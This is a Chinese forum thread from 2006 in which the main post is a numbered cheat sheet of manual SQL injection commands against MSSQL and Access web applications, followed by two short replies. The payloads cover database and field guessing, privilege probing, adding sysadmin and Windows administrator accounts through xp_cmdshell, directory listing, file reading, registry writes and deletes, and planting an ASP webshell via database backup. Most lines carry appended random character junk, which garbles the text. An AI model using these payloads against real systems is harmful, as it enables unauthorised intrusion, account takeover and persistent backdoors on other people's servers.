社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3406阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 ~,reS:9RZ  
  2.初步判断是否是mssql ;and user>0 2%t!3F:  
;%xG bg!lg  
  3.注入参数是字符'and [查询条件] and ''=' e}q!m(K]e-  
f'B#h;`  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' K yp(dp>  
{;?bC'  
  5.判断数据库系统 \t]aBT,  
1Yy*G-7}  
  ;and (select count(*) from sysobjects)>0 mssql 3G-f+HN^E  
}t5pz[zl  
  ;and (select count(*) from msysobjects)>0 access }#9 |au`  
`pYL/[5  
cUZ^,)8 Z  
U%_6'5s{^  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 ?=\_U  
v$bR&bCT  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 / lN09j  
EO \@#",a  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0  Fs1ms)  
vKNxL^x  
  9.(1)猜字段的ascii值(access) ?iNihE  
w0$l3^}z  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 iVb#X#  
CiC@Z,ud`  
  (2)猜字段的ascii值(mssql) ,v*<yz/  
,Y2){8#l  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 J|[`8 *8  
Ov8{ny  
  10.测试权限结构(mssql) px.]m-  
' $X}'u  
@)m+b;  
4p_@f^v~QH  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- b:(*C  
>rzpYc'~w  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- Nyo,6 AA  
&1,qC,:!  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- qGc>+!y  
DSx D531[A  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ?3Dsz  
vCtag]H2@  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- }-ysP$  
j8#B  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- >l|dLyiae  
K>fY9`Whm  
  ;and 1=(select IS_MEMBER('db_owner'));-- @ei:/~y3  
gSu3\keF  
IDr$Vu4LCW  
E[E[Za^Y  
  11.添加mssql和系统的帐户 |p{FSS  
\.jT"Z~  
  ;exec master.dbo.sp_addlogin username;-- B|n<{g[-cM  
  ;exec master.dbo.sp_password null,username,password;-- /-jk_8@a  
@^93q  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- KmlpB  
FR@## i$  
  ;exec master.dbo.xp_cmdshell 'net user username password xT1{O`  
p&ml$N9fd  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- kVb8$Sp  
4>xv7  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- #3act )m  
-QUvd1S40  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- Qr l>A*  
_w>9Z>PR  
rC!~4xj-  
Q!dNJQpb  
  12.(1)遍历目录 S[W|=(f9  
1ssEJ; #s  
  ;create table dirs(paths varchar(100), id int) 0q ^dpM  
+R?d6IjH  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' ;qT7BUh(%  
[{!5{k!  
  ;and (select top 1 paths from dirs)>0 )51H\o  
8y, ]>n  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) xkzC+ _A  
SRx `m,535  
3xnu SOdh  
mf)o1O&B  
  (2)遍历目录 (j;6}@  
sS|N.2*  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- \aG:l.IM0  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 kGSB6  
H:HJHd"W  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 `Dco!ih  
mME a*9P  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 h^KLqPBt{  
e.IKmH]z  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 =K2mR}n\;  
#7A_p8  
hup< U+p  
zbDM+;  
  13.mssql中的存储过程 I5J9,j  
 Gp/yr  
  xp_regenumvalues 注册表根键, 子键 icPg<>TQ  
SlZ>N$E  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 T=QV =21qn  
r%/*,lLO  
  xp_regread 根键,子键,键值名 H]7;O M/g  
3yfq*\_uXw  
  ;exec xp_regread )} H46  
p}'uCT ga  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 2nRL;[L*.  
E5<}7Pt  
  xp_regwrite 根键,子键, 值名, 值类型, 值 0-W{(xy@4  
IJA WG  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 bLysUj5[5  
S:En9E  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 BEzF'<Z  
93npzpge  
  xp_regdeletevalue 根键,子键,值名 uI I:Y{G  
0#rv.rJ{  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 3:h9cO/9  
hd2 X/"  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 N}3$1=@Y  
9s-op:5  
zW_V)U Ne  
U8z$=W o  
  14.mssql的backup创建webshell {<HL}m@kQ  
6"Km E}  
  use model lFNf/j^Z  
heliL/  
  create table cmd(str image); l ^*GqP5  
/IS j0"/$  
  insert into cmd(str) values (''); ?N,'1I  
Uk02VuS  
  backup database model to disk='c:\l.asp'; jy] hP?QG  
o[bG(qHZ  
D %`64R  
D/w4u;E@  
  15.mssql内置函数 ? 5qo>W<7  
RrkS!E[C  
  ;and (select @@version)>0 获得Windows的版本号  l+.E'   
/]Fs3uf  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa *@q+A1P7@  
-BNlZgk-^  
  ;and (select user_name())>0 爆当前系统的连接用户 QJ`#&QRp  
y#AwuC K  
  ;and (select db_name())>0 得到当前连接的数据库 o?f7_8fG  
aPq9^S*  
ai(<"|(  
fa#]G^f  
  16.简洁的webshell Vs~^r>  
HV`{YuP  
  use model -}m#uUqI  
4'W|'4'b  
  create table cmd(str image); &t +   
\guZc}V]:\  
  insert into cmd(str) values (''); .[hQ#3)W  
%:n1S]Vr  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
欢迎提供真实交流,考虑发帖者的感受
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八